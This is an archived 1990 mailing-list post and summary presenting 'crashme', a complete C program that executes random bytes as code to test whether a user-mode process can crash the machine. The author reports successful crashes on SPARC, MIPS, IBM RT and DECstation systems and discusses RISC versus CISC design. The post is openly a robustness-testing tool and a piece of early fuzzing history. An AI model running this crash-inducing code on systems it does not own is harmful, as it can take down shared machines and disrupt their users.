Crash a RISC machine from user-mode code:

Thu Aug 9 09:09:00 AEST 1990

This is what I got through email (very interesting):

From:
DECWRL::"zaphod.mps.ohio-state.edu!usc!samsung!mitech!gjc at tut.cis.ohio-state.edu"
"MAIL-11 Daemon" 31-JUL-1990 00:03:39.91
To:	info-vax at kl.sri.com 
CC:	
Subj:	how to crash a RISC machine from user-mode code: !!! 

I am posting this to info-vax because lots of people on this list
would have SUN-4's or other RISC machines to try it on, and we VAX
users could use a good chuckle from time to time.

The motivation here: As I was reading about the SPARC architecture I
thought, gee, it must be quite a pain to do the analysis of all the
billions of different machine-state combinations one could get executing
a sequence of a few random instructions. And I *do* mean random. Not
well behaved stuff like compilers are supposed to generate, but really
random data executed as code. Buggy programs are jumping off into data
space all the time.

Extract this as crashme.c, compile it with cc -o crashme crashme.c,
and then try this:
% crashme 1000 10 200

On the few SUN-4's I've tried, this allows a user-mode program to
crash the system. Is it a hardware bug (hard to fix) or just a
software bug? I don't know. Report your findings back to me
and I will summarize. (Try it with different argument combinations.)

/* crashme: Create a string of random bytes and then jump to it.
            crashme <nbytes> <srand> <ntrys>

THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT SHALL
HE BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
SOFTWARE.

A signal handler is set up so that in most cases the machine exception
generated by the illegal instructions, bad operands, etc in the procedure
made up of random data are caught; and another round of randomness may
be tried. Eventually a random instruction may corrupt the program or
the machine state in such a way that the program must halt.

Note: This program has never caused any problem on a VAX, or other CISC
      architecture with a protected-mode operating system, but on certain
      RISC machines it has been observed to allow a user-mode program to
      crash the machine.

*/

#include <stdio.h>
#include <stdlib.h>   /* atol, malloc, exit, rand, srand */
#include <signal.h>
#include <setjmp.h>

long nbytes,nseed,ntrys;
unsigned char *the_data;

jmp_buf again_buff;

void (*badboy)();

void again_handler(sig, code, scp, addr)
     int sig, code;
     struct sigcontext *scp;
     char *addr;
{char *ss;
 switch(sig)
   {case SIGILL: ss =   " illegal instruction"; break;
    case SIGTRAP: ss =   " trace trap"; break;
    case SIGFPE: ss =   " arithmetic exception"; break;
    case SIGBUS: ss =  " bus error"; break;
    case SIGSEGV: ss =  " segmentation violation"; break;
   default: ss = "";}
 fprintf(stderr,"Got signal %d%s\n",sig,ss);
 longjmp(again_buff,3);}

set_up_signals()
{signal(SIGILL,again_handler);
 signal(SIGTRAP,again_handler);
 signal(SIGFPE,again_handler);
 signal(SIGBUS,again_handler);
 signal(SIGSEGV,again_handler);}

compute_badboy()
{long j,n;
 n = (nbytes < 0) ? - nbytes : nbytes;
 for(j=0;j<n;++j) the_data[j] = (rand() >> 7) & 0xFF;
 if (nbytes < 0)
   {fprintf(stdout,"Dump of %ld bytes of data\n",n);
    for(j=0;j<n;++j)
      {fprintf(stdout,"%3d",the_data[j]);
       if ((j % 20) == 19) putc('\n',stdout); else putc(' ',stdout);}
    putc('\n',stdout);}}

try_one_crash()
{compute_badboy();
 if (nbytes >= 0) 
   (*badboy)();}

main(argc,argv)
 int argc; char **argv;
{long i;
 if (argc != 4) {fprintf(stderr,"crashme <nbytes> <srand> <ntrys>\n");
		 exit(1);}
 nbytes = atol(argv[1]);
 nseed = atol(argv[2]);
 ntrys = atol(argv[3]);
 fprintf(stdout,"crashme %ld %ld %ld\n",nbytes,nseed,ntrys);
 fflush(stdout);
 the_data = (unsigned char *) malloc((nbytes < 0) ? -nbytes : nbytes);
 badboy = (void (*)()) the_data;
 /* cast so the arguments match the long-sized format specifiers */
 fprintf(stdout,"Badboy at %ld. 0x%lX\n",(long) badboy,(unsigned long) badboy);
 srand(nseed);
 for(i=0;i<ntrys;++i)
   {fprintf(stderr,"%ld\n",i);
    if(setjmp(again_buff) == 3)
      fprintf(stderr,"Barfed\n");
    else
      {set_up_signals();
       try_one_crash();
       fprintf(stderr,"didn't barf!\n");}}}

-----end of crashme.c----------  
% ====== Internet headers and postmarks (see DECWRL::GATEWAY.DOC) ======
From:	DECWRL::"usc!samsung!mitech!gjc at ucsd.edu" "MAIL-11 Daemon"  2-AUG-1990
03:25:34.83
To:	info-vax at kl.sri.com 
CC:	
Subj:	SUMMARY: How to Crash a RISC, or Revenge of the VAX? 

OK. Here is a quick summary of the HOW TO CRASH A RISC machine from
a USER-MODE program test. Reports have arrived that all of these machines
can be crashed using CRASHME.C:
IBM RT, MIPS, DECSTATION 5000, SPARC.

On the two CISC architectures tried, VAX/VMS and SUN-3, the program
either completed or exited with a core or register dump, as expected.

Some background/motivation. My experience with microcode programming
taught me that some sequences of MICROINSTRUCTIONS could wedge or jam
the hardware in such a way that recovery was impossible without
a reboot of some kind. The RISC architectures have some of the same
properties as MICROCODE in that certain instruction sequences have
UNDEFINED behavior. Now one of the great costs in a CISC machine is
usually the trouble the designers go through to make sure that
every instruction returns the MACHINE to a KNOWN STATE. That way
the behavior of every instruction can be well defined, documented,
and individually verified and tested, and by simple induction
be valid for arbitrary SEQUENCES of instructions (in general).

Engineers of RISC machines don't bother to do this, which is one of
the reasons they are CHEAPER (the hardware, not the engineers).

Proving that an arbitrary sequence of instructions "N" long will
not crash the machine is much more costly if N > 1.
(To say the least, if you know anything about mathematical logic.)
If there are M instructions (and M is probably around 1 BILLION)
then there may be about M^N cases to check. And what is N? 
For a classic CISC machine a price is paid to make N = 1, or
at least small. But for a RISC machine, might N be 10 or more?

Anyway, no need to make too big a deal about this. Probably all the
vendors can fix things in software alone, and certainly CISC chips
with bugs in them have been shipped in the past too.

Just a reminder though. There is no free lunch. There really is
a trade-off among ROBUSTNESS, PRICE/PERFORMANCE, and TIME_TO_MARKET.

-gjc